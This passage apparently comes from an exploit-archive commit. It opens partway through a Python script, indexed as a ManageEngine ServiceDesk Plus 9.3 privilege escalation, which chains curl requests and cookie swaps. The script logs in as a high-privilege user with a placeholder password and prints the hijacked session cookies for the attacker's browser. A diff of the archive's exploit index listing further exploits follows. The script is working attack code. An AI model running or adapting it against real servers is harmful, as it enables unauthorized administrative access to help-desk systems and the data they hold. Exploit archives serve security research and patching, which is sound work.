-H $'Host: "+host+"' \
-H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
$'"+url+"/mc/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print("\033[1;32mCaptured secondary sessid.\033[1;37m")
print(sessid2)
print("\033[1;31mDoing the magic step 1.\033[1;37m")
curl = "curl -i -s -k -X $'GET' \
-H $'Host: "+host+"' \
-H $'Referer: "+url+"/mc/WOListView.do' \
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
$'"+url+"/mc/jsp/MCLogOut.jsp'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
print("\033[1;31mDoing the magic step 2.\033[1;37m")
curl = "curl -i -s -k -X $'GET' \
-H $'Host: "+host+"' \
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
$'"+url+"/mc/jsp/MCDashboard.jsp'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
curl = "curl -i -s -k -X $'GET' \
-H $'Host: "+host+"' \
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
$'"+url+"/'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
curl = "curl -i -s -k -X $'POST' \
-H $'"+host+"' \
-H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
-H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
--data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
$'"+url+"/mc/j_security_check'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
curl = "curl -i -s -k -X $'GET' \
-H $'Host: "+host+"' \
-H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
-H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
-H $'Upgrade-Insecure-Requests: 1' \
-b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
$'"+url+"/mc/jsp/MCDashboard.jsp'"
out = os.popen('/bin/bash -c "' + curl+'"').read()
sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
print("JSESSIONID=" + sessidhigh)
print("JSESSIONIDSSO=" + sessidssohigh)
print(grbl2[0] + "=" + grbl2[1])
print(grbl2[2] + "=" + grbl2[3])
print("_rem=true")

4
files_exploits.csv
View file

@ -10396,6 +10396,7 @@ id,file,description,date,author,type,platform,port
46625,exploits/windows/local/46625.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)",2019-03-28,"Paolo Perego",local,windows,
46636,exploits/windows/local/46636.py,"AIDA64 Extreme / Engineer / Network Audit 5.99.4900 - SEH Buffer Overflow (EggHunter)",2019-04-02,"Peyman Forouzan",local,windows,
46657,exploits/windows/local/46657.py,"AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH)",2019-04-04,"Anurag Srivastava",local,windows,
46660,exploits/windows/local/46660.py,"AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow",2019-04-05,"Peyman Forouzan",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17297,6 +17298,7 @@ id,file,description,date,author,type,platform,port
46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution",2019-04-03,"Metin Yunus Kandemir",remote,python,80
46654,exploits/multiple/remote/46654.html,"Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion",2019-04-03,"Google Security Research",remote,multiple,
46655,exploits/hardware/remote/46655.rb,"Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)",2019-04-03,Metasploit,remote,hardware,
46662,exploits/php/remote/46662.rb,"WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41098,3 +41100,5 @@ id,file,description,date,author,type,platform,port
46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80
46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80
46659,exploits/windows/webapps/46659.py,"Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,windows,
46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,

Can't render this file because it is too large.